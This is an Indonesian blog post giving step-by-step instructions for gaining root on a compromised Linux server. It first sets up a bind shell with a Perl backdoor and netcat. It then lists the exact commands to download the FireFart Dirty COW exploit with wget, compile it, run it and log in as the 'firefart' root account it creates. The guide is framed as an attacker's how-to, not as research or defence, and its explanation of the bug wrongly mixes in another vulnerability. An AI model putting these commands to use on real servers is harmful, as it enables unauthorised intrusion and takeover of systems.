Saturday, June 6, 2020

ROOT SERVER WITH DIRTY



Tentang Local ROOT

Local exploit atau rooting adalah mengeksploitasi server linux di jaringan publik agar kita bisa mengakses penuh server tersebut. Biasanya seorang attacker setelah berhasil mengeksploitasi sebuah sistem dilanjutkan dengan aktifitas “Previlige Escalation” dengan tujuan dapat berbuat banyak pada sistem, caranya bermacam-macam  dengan berbagai cara seperti trapdoor, local exploiting.
Bugs ini di temukan oleh Oleg Nestorov, konsepnya eksploit ini memperbolehkan kepada kita untuk mengirim arbitrary signal ke proses parent user ber-privileged penuh ke sistem (suidroot). ketika hal itu terjadi, child proses bersamaan dengan exit signal dapat berakibat yang pertama tereksekusinya suidroot binary dan fungsi exit() dalam kernel dan melewati proses otentifikasi kernel dan juga melibatkan utilitas chfn dan gpasswd untuk mendapatkan privilege root.

DIRTY COW sendiri hanya work pada CVE-2016-5195 atau pada kernel yang tahunnya pada 2016 ke bawah dan bulannya September ke bawah, karena menurut riset yang saya lakukan , meskipun kernel servernya pada tahun 2016 tapi bulannya menunjukan October - Desember user tidak akan tertulis pada /etc/passwd yang memungkinkan kita tidak bisa login pada ssh yang telah dibuat melalui proses root server tadi.

Sebelum masuk ke tahap root server disini saya menyarankan untuk memakai BIND SHELL untuk melakukan back connect bagi pemula, karena selain instan cara ini juga tidak ribet.

STEP BY STEP :
  • Upload script pada target CLICK DISINI
  • Masukan command perl script.pl 1337 [ untuk port bebas dan jangan dulu di execute]
  • Ambil IP server target lalu buka terminal
  • Masukan command nc -vv IPSERVER 1337 
  • Kembali ke backdoor dan klik execute lalu klik enter pada terminal
  • apabila muncul tulisan " no job controll in this shell " itu tandanya berhasil

Setelah berhasil melakukan back connect lalu masuk ke tahap root server, seperti judul postingan kali ini, disini saya akan memakai DIRTY COW .

COMMAND ROOT SERVER WITH DIRTY :
  • wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
  • gcc -pthread dirty.c -o dirty -lcrypt
  • chmod 777 dirty
  • ./dirty
  • python -c 'import pty;pty.spawn("/bin/sh")'
  • su firefart / ssh firefart@localhost
Apabila belum jelas silahkan liat video berikut :


Sekian dan semoga bermanfaat.

No comments: